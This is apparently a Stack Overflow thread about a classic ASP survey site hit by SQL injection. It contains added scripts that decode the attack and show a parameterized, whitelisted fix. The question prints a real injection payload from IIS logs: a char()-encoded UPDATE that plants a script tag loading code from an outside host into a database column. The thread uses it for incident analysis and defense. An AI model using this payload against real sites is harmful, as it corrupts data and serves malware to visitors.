We have a survey site that was apparently attacked. The symptoms are identical to what was described on the following page on this site: http://stackoverflow.com/questions/3775964/xss-attack-on-the-asp-net-website.

I found multiple entries in our IIS logs that included the malicious code:

< / title> < script src = http : // google-stats49.info/ur.php >.

Here is an example of the value of the cs-uri-query field for one of the IIS log entries.

surveyID=91+update+usd_ResponseDetails+set+categoryName=REPLACE(cast(categoryName+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2Bchar(101)%2Bchar(45)%2Bchar(115)%2Bchar(116)%2Bchar(97)%2Bchar(116)%2Bchar(115)%2Bchar(53)%2Bchar(48)%2Bchar(46)%2Bchar(105)%2Bchar(110)%2Bchar(102)%2Bchar(111)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--

I don't understand how the above code works but apparently this is what is being sent in a query string to corrupt columns in our database tables. We have shut down our site for the time being. We can remove the scripts from the database but that doesn't prevent it from being corrupted again when we bring the site back online.

Does anyone have any suggestions on how to prevent this from happening?
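To see what that log entry does, here is an added script (not from the question or any of the answers) that takes the cs-uri-query value exactly as it appears above, URL-decodes it (`+` is a space, `%2B` is a plus sign) and then collapses every `char(N)+char(N)+...` chain into the string literal SQL Server builds from it. Nothing beyond the log line itself is assumed; it runs under cscript on any Windows box.

```vbscript
' decode_query.vbs  -  run with:  cscript //nologo decode_query.vbs
' Added example (not from the question or any answer): URL-decodes a cs-uri-query
' value from the IIS log and turns every char(N)+char(N)+... chain back into the
' string literal SQL Server would build, so the injected statement can be read.
Option Explicit

' Sample input: the cs-uri-query value copied from the log entry in the question.
Dim csUriQuery
csUriQuery = "surveyID=91+update+usd_ResponseDetails+set+categoryName=REPLACE(cast(categoryName+as+varchar(8000))," & _
    "cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)" & _
    "%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)" & _
    "%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)" & _
    "%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)" & _
    "%2Bchar(101)%2Bchar(45)%2Bchar(115)%2Bchar(116)%2Bchar(97)%2Bchar(116)%2Bchar(115)%2Bchar(53)" & _
    "%2Bchar(48)%2Bchar(46)%2Bchar(105)%2Bchar(110)%2Bchar(102)%2Bchar(111)%2Bchar(47)%2Bchar(117)" & _
    "%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)" & _
    "%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)" & _
    "+as+varchar(8000)),cast(char(32)+as+varchar(8)))--"

' In a query string '+' is a space and %XX is a hex-encoded byte (%2B is '+').
Function UrlDecode(s)
    Dim re, m, out, pos
    s = Replace(s, "+", " ")
    Set re = New RegExp
    re.Global = True
    re.Pattern = "%([0-9A-Fa-f]{2})"
    out = "" : pos = 1
    For Each m In re.Execute(s)
        out = out & Mid(s, pos, m.FirstIndex + 1 - pos) & Chr(CLng("&H" & m.SubMatches(0)))
        pos = m.FirstIndex + m.Length + 1
    Next
    UrlDecode = out & Mid(s, pos)
End Function

' Replaces each char(N)+char(N)+... chain with the quoted string it builds.
' The \b keeps "varchar(8000)" from being read as a char() call.
Function DecodeCharChains(sql)
    Dim re, numRe, m, n, out, pos, literal
    Set re = New RegExp
    re.Global = True
    re.IgnoreCase = True
    re.Pattern = "\bchar\(\d+\)(\s*\+\s*char\(\d+\))*"
    Set numRe = New RegExp
    numRe.Global = True
    numRe.Pattern = "\d+"
    out = "" : pos = 1
    For Each m In re.Execute(sql)
        literal = ""
        For Each n In numRe.Execute(m.Value)
            literal = literal & Chr(CLng(n.Value))
        Next
        out = out & Mid(sql, pos, m.FirstIndex + 1 - pos) & "'" & Replace(literal, "'", "''") & "'"
        pos = m.FirstIndex + m.Length + 1
    Next
    DecodeCharChains = out & Mid(sql, pos)
End Function

WScript.Echo "raw query:      " & csUriQuery
WScript.Echo "as SQL sees it: " & DecodeCharChains(UrlDecode(csUriQuery))
```

The second line of output reads as one UPDATE statement: the value after `surveyID=` starts with `91`, so a page that pastes the raw query-string value into its SQL text runs everything after the number as further SQL, and the trailing `--` comments out whatever the page appended after it. The two char() chains collapse into a single `</title><script src=...></script>` literal and a one-character space, the second and third arguments of the REPLACE on categoryName. Note that the host in this entry ends in `stats50`, not the `stats49` quoted earlier, so it is worth running the same two functions over every cs-uri-query in the logs rather than assuming one variant.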

+3  A: 

That's a SQL injection.

  1. Never trust user input. You're taking input and sending it directly to the database.
  2. Never trust your user input!
  3. Check all input against a whitelist of allowed values.
  4. For text input, make sure everything is escaped.

There are tons on this subject: Google is your friend.

Cfreak
@Cfreak: No, Google isn't your friend. In fact, it's quite the opposite. And I don't say this just because they threw everyone's privacy out the window a long time ago. :)
Esteban Araya
@Esteban - Or, because they're working with Verizon to purchase the Internet so that they can run it like a toll road?
orokusaki
+1  A: 

Also...

  1. Use parameterized queries.
  2. Get off old classic ASP, which makes it harder to use parameterized queries. Move to .NET, which has easier validation and can restrict values, disallow HTML input and so on.
Nikki9696
A: 

I suggest you search for any pages that contain Request.QueryString, since it's most often a GET parameter that isn't being filtered (frequently a value that should be an integer) and liberally use the built-in functions CInt, CLng and IsNumeric to stop the injections in their tracks. It should be quicker than rewriting all of your queries to use parameters or creating stored procedures in SQL Server, though that would be the way to go if you're still busy developing the application. You should also disable EXEC permission for the application's user account in SQL Server.

(Sorry, tried linking the other functions but as a new user I'm only allowed one hyperlink. :-))

stealthyninja
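The three answers describe one fix from different angles: whitelist the input (Cfreak), bind it as a parameter instead of concatenating it (Nikki9696), and in classic ASP specifically, turn the surveyID value into a number before it goes anywhere near the query (stealthyninja). Here is an added classic ASP page, not posted by any of the answerers, that does all three for the surveyID parameter from the log entry. It assumes a connection string in Application("ConnString") and that usd_ResponseDetails, the table named in the log, has an integer surveyID column alongside categoryName; both are assumptions, not details from the question.

```vbscript
<% Option Explicit %>
<%
' survey.asp  -  added example, not code from the question or any of the answers.
' Assumptions: the connection string lives in Application("ConnString") (set in
' global.asa), and usd_ResponseDetails (the table named in the log entry) has an
' integer surveyID column next to categoryName.

' BEFORE - the pattern behind the log entry. Whatever follows "surveyID=" in the
' URL becomes part of the SQL text, so "91 update ... --" is executed as written:
'
'   sql = "SELECT categoryName FROM usd_ResponseDetails WHERE surveyID = " _
'       & Request.QueryString("surveyID")

' AFTER, step 1: whitelist the parameter. A survey id is a short run of digits and
' nothing else. (IsNumeric is looser: it also accepts "1e3", "&H10" and signed values.)
Function ReadSurveyId()
    Dim raw, re
    raw = Trim(Request.QueryString("surveyID"))
    Set re = New RegExp
    re.Pattern = "^\d{1,9}$"
    If re.Test(raw) Then
        ReadSurveyId = CLng(raw)
    Else
        ReadSurveyId = -1
    End If
End Function

' AFTER, step 2: send the value as a typed parameter, never as SQL text.
Function LoadCategories(surveyId)
    Dim cmd
    Set cmd = Server.CreateObject("ADODB.Command")
    cmd.ActiveConnection = Application("ConnString")   ' assumed application variable
    cmd.CommandType = 1   ' adCmdText
    cmd.CommandText = "SELECT categoryName FROM usd_ResponseDetails WHERE surveyID = ?"
    ' 3 = adInteger, 1 = adParamInput, 4 = size in bytes: the driver binds the value
    ' as a number, so it can never be interpreted as SQL keywords.
    cmd.Parameters.Append cmd.CreateParameter("surveyID", 3, 1, 4, surveyId)
    Set LoadCategories = cmd.Execute
End Function

Dim requestedId, rs
requestedId = ReadSurveyId()
If requestedId < 0 Then
    Response.Status = "400 Bad Request"
    Response.Write "surveyID must be a whole number."
    Response.End
End If

Set rs = LoadCategories(requestedId)
Do Until rs.EOF
    ' AFTER, step 3: encode on output, so markup that did get stored renders as
    ' text instead of loading a script tag into the page.
    Response.Write Server.HTMLEncode(rs("categoryName") & "") & "<br>"
    rs.MoveNext
Loop
rs.Close
%>
```

To find every page that needs this treatment, `findstr /s /i /n "Request.QueryString" *.asp` over the site root lists the candidates stealthyninja describes; the ones where the value is concatenated into a SQL string are the ones to convert. Step 2 is also what makes stealthyninja's permissions point bite: once the application login is limited to SELECT on lookup tables and has no EXEC, a parameter that slipped through validation still cannot rewrite categoryName.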